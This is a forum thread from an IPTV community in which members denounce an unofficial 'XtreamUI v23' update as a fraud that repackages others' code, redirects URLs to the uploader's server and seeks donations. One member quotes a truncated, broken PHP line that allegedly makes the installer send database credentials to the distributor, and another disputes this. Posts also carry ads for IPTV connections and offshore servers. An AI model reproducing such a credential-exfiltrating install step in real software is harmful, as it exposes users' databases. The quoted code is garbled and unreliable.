Welcome to World of IPTV

With

+23k members
+11k threads
+106k posts

we are the most popular IPTV community on the web. 

IMPORTANT NOTE:
WE HAVE RECENTLY NOTICED THAT TOO MANY DOUBLE FAKE ACCOUNTS ARE CREATED IN THE PAST.
TO PREVENT THIS ISSUE THE DECISION WAS MADE THAT IN THE FUTURE A ANNUALLY FEE 20 EURO WILL BE RAISED FOR NEW MEMBERSHIPS.

Join now to the World of IPTV

Forum Rules

Before you start, check out the forum rules first

Account upgrade

Upgrade your account to get access to full features

Advertising

Would you like to place your advertisement with us ?

Resources Manager

Hundreds of IPTV scripts and apps are available for download

Info Fake NEWS - XtreamUI Update v23

urgodfather

Banned
Banned
Ext. Member
Reaction score
Beware of rumors for a v23 update. It is not OFFICAL!. It has no affiliation to the XtreamUI team. There is nothing special about the "update v23." They just steal other's sharing's from the Official forum, and zip it up. The person has already been told proper procedure if they want to collaborate on the XtreamUI project. Until that procedure is followed, they will be considered a fraud. Any postings about this fake update will also be considered a violation of the Rules both HERE and THERE and your accounts will be BANNED. Understood?

To those who wish to contribute, I urge you to contact GTA or even ME and we will get something worked out BUT, IF you think you want to just "take over" like this person said yesterday, you have a sad awakening coming.

senkron24

Banned
Banned
Ext. Member
Reaction score
yeah you samewehere right
bud its open sourch he can edit and gived to the peaple whwre want its not steal or cheeting samthink like this
he have changed samthink on it for example samebudy wanted so long time about user agnet so simpel to edit bud gta was just ignore this
and auchso long time ago gta will bring out new update witch date we dont know mybe 2022 ,,,
and mybe same other teams will started this projeckt with hims team and bring out news
i thinks this of reaction not good if thare no bad thinks on the update on unofficial ..
ofcourse we have big respeckt on gta
bud we need same bug fixed and news on this projeckt
and gta says it will be every time free .. also no lisancend he gift to the world
i think must give auchso little change to other teams if he can make difrens and not give this reactions..

i think in endefeckt will winn the end user /....

it can be good efeckt ..#

Kind Regarts

ps: i not know where this or where make this update i have nothink to do with tham.,..

Channels MatchTime Unblock CDN Offshore Server Contact
100 cnx / 90€ 5Gbps / 180€ 48CPU-256GRAM 10Gbps 569€ Skype live:giefsl
500 cnx / 350€ 10Gbps / 350€ 48CPU-128GRAM 5Gbps / 349€ TG @changglobize
1000 cnx / 500€ 20Gbps / 700€ 40CPU-128GRAM 20Gbps / €980 http://coronaserver.com

urgodfather

Banned
Banned
Ext. Member
Reaction score
There is a difference between being part of development and being fraud. This person is fraud. They have no involvement with XtreamUI. With open source you can modify for yourself, but all things are either FORKED or MERGED. This person does not do either. This makes fraud and they fool you for donations b/c they know how to replace urls. This person has already been told this. I have already seen the code. There is no improvements. Only copy and paste and change URL's to redirect to their server.

When you choose to use another's name, falsely claim as being part of development, and trick people to fund you, this is called FRAUD. They know it. They do not care because even with this warning, some users will still foolishly donate to him.

senkron24

Banned
Banned
Ext. Member
Reaction score
There is a difference between being part of development and being fraud. This person is fraud. They have no involvement with XtreamUI. With open source you can modify for yourself, but all things are either FORKED or MERGED. This person does not do either. This makes fraud and they fool you for donations b/c they know how to replace urls. This person has already been told this. I have already seen the code. There is no improvements. Only copy and paste and change URL's to redirect to their server.

When you choose to use another's name, falsely claim as being part of development, and trick people to fund you, this is called FRAUD. They know it. They do not care because even with this warning, some users will still foolishly donate to him.

Thanks for this nice answer./..

Clear inuf...

Kind Regarts

doc

Banned
Banned
Ext. Member
Reaction score
If releases are public, there will not be fake news.

1000 cnx / 500€ 20Gbps / 700€ 40CPU-128GRAM 20Gbps / €980 http://coronaserver.com

urgodfather

Banned
Banned
Ext. Member
Reaction score
It is Fake news if it is not Official. It is not official if it does not come from OFFICIAL sources. That is what makes it FAKE. It is want to be like someone else I know who make forum because they want to be.

As I have stated before you have Official and you have Unofficial. With community projects you have Fork and you have Merge. This is neither. ? It is only paper sign with copy and paste code taken from others saying "Here is new release, pay me instead."

heiten

Extended Member
Ext. Member
Reaction score
gone through and seen it sends your DB to them... they have full access too

if ((isset($_GET["manage-db"])) && (hasPermissions("adv", "settings"))) { file_put_contents("database.php", fopen("'r')); header("Location: ./settings.php");exit; when it installs th phpmyadmin is sends the DB info to them

so you can use the UNOfficial

Last edited by a moderator:

cdev

Extended Member
Ext. Member
Reaction score
It is Fake news if it is not Official. It is not official if it does not come from OFFICIAL sources. That is what makes it FAKE. It is want to be like someone else I know who make forum because they want to be.

As I have stated before you have Official and you have Unofficial. With community projects you have Fork and you have Merge. This is neither. ? It is only paper sign with copy and paste code taken from others saying "Here is new release, pay me instead."
Amazing isnt it. People actually trying to take credit for someone elses hard work, hours upon hours of labor, and TRUE TALENT. There will alway be POSERS, but there is only 1 GTA. RESPECT!!

GaiusBaltar

Extended Member
Ext. Member
Reaction score
gone through and seen it sends your DB to them... they have full access too

if ((isset($_GET["manage-db"])) && (hasPermissions("adv", "settings"))) { file_put_contents("database.php", fopen("'r')); header("Location: ./settings.php");exit; when it installs th phpmyadmin is sends the DB info to them

so you can use the UNOfficial

For the sake of truth there is no difference from this database.txt and original file still showed on release 20C.
The question is why they need to pickup from their website. Also "Copyright © 2020 - Xtream UI - Powered by DaZPlayer V23A - Early Access"
seems a clear FRAUD.

micmaree

Extended Member
Ext. Member
Reaction score
Look at this if somebody want to do some thing, make'it private not bullshit's

1.png

2.png

3.png

urgodfather

Banned
Banned
Ext. Member
Reaction score
Look at this if somebody want to do some thing, make'it private not bullshit's

And there is nothing wrong with this. None at all. There is difference between making variation with distinct differences and misleading others to believe is one and same.

micmaree

Extended Member
Ext. Member
Reaction score
And there is nothing wrong with this. None at all. There is difference between making variation with distinct differences and misleading others to believe is one and same.
I agree with you, nobody mess with the people work , becouse it's hard work losing nights of coding and working and when you see some guys doing shit's like this you go creazy , i've checked these guys code , they do nothing it's copy paste , and they using the official name,
shame to them...

shape1
shape2
shape3
shape4
shape5
shape6
AdBlock Detected

We know, ad-blocking software do a great job at blocking ads. But our site is sponsored by advertising. 

For the best possible site experience please take a moment to disable your AdBlocker.
You can create a Account with us or if you already have account, you can prefer an Account Upgrade.

I've Disabled AdBlock